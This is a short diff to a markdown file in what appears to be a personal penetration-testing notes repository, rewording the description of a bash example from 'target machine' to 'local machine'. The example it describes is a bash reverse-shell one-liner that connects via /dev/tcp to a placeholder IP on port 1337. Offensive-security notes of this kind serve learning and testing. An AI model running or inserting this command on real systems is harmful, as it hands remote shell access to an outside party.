xxsbravo/PwnNotes/Linux/bash.md

 ## Example

-The following command creates a reverse shell on a target machine in an interactive **bash**.
+The following command creates a reverse shell on a local machine in an interactive **bash**.

 	bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/1337 0>&1